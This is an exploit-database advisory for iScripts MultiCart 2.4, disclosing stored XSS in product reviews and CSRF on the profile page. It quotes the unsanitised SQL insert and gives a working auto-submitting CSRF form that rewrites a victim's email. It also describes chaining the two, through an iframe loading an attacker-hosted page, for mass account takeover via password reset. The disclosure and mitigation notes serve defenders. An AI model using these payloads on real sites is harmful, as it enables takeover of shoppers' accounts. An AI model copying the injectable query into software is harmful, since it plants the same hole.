iScripts MultiCart - exploit.company

vendor:

MultiCart

by:

Saadat Ullah

N/A

CVSS

MEDIUM

Cross-site Scripting, Cross-site request forgery

79, 352

CWE

Product Name: MultiCart

Affected Version From: 2.4

Affected Version To: 2.4

Patch Exists: NO

Related CWE:

CPE: a:iscripts:multicart:2.4

Metasploit:

Other Scripts:

Platforms Tested: Apache/2.2.15 PHP/5.3.3

2013

iScripts MultiCart <= 2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover

iScript MultiCart is a paid shopping cart system that suffers from XSS and Cross-site request forgery vulnerability. An attacker can manipulate user data by sending them a malicious crafted URL. The XSS vulnerability is found in the product Review feature, allowing the execution of injected code whenever a product is visited by clients. The CSRF vulnerability allows an attacker to perform actions on behalf of a victim user without their consent.

Mitigation:

To mitigate the XSS vulnerability, input data should be properly sanitized before being inserted into the database. To mitigate the CSRF vulnerability, implement CSRF tokens and validate the token on every request that modifies user data.

Source

Exploit-DB raw data:

# Exploit Title  : iScripts MultiCart <=  2.4 Persistent XSS / CSRF / XSS+CSRF Account takeover
# Date           : 2013/12/14
# Exploit Author : Saadat Ullah ， saadi_linux[at]rocketmail[dot]com
# Software Link  : http://www.iscripts.com
# Author HomePage: http://security-geeks.blogspot.com
# Tested on: Server : Apache/2.2.15 PHP/5.3.3

# Cross-site Scripting

iScript MultiCart is an paid shoping cart system , suffers from XSS and Cross-site request forgery vulnerability through which 
attacker can manipulate user data via sending him malicious craft url.

XSS in product Review , so alot exploitation can be done as inject code will be execute whenever a product is visited by clients.
In Product_review.php line 52--- Persistent XSS

mysql_query("insert into ".$tableprefix."Review (nUserId,nProdId,vDes,vActive) values ('".$_SESSION["sess_userid"]."',

						'".$_POST["pid"]."','".$_POST["txtReview"]."','".$aActive."')") or die(mysql_error());
						
$_POST['txtReview'] is inserted without sanitizing.

Exploitation

Goto http://site.tld/product_review.php?pid=[any product id]
Paste your xss vector and submit.

XSS vector will be executed here
http://site.tld/productdetails.php?productid=1 -->same product id for which you submited the review.

# Cross-site request forgery
<html>
	 <body onload="javascript:document.forms[0].submit()">
	 <form  name="ex"action="http://localhost/profile.php" method=post >
	 
			 
				<input type=hidden size=30 maxlength=30 name=userid value="5">
			 
				<input type=hidden size=30 maxlength=30 name=txtFirstName value="admin">
			 
				<input type=hidden size=30 maxlength=100 name=txtLastName value="admin">
			 
		 
				<input type=hidden size=30 maxlength=30 name=txtEmail value="admin@gmail.com">
	 
				<input type=hidden size=30 maxlength=30 name=txtAddress1 value="asdf">
				<input type=hidden size=30 maxlength=30 name=txtCity value="saf">
				<input type=hidden size=30 maxlength=30 name=bill_country value="DZ">
				<input type=hidden size=30 maxlength=30 name=bill_state value="adsf">
		
			    <input type=hidden size=30 maxlength=250 name=btnSaveChanges value="Save Changes">
		        <input type=submit   name=btnSaveChanges class=button value='Save'> 
	</form>
</html>

#     XSS+CSRF Mass Email Change /Mass Account Takeover

XSS+CSRF can be used to change mass user email ,  after changing the email we can change the password too via
forget password option and providing email.
Just inject a CSRF iframe as XSS vector on product_review.php
E.g
<iframe src="http://www.site.tld/inject.html"></iframe>
Inject.html ---> CRSF exploit

So now whenever user browse different products their useremail will be changed automatically.

#Independent Pakistani Security Researcher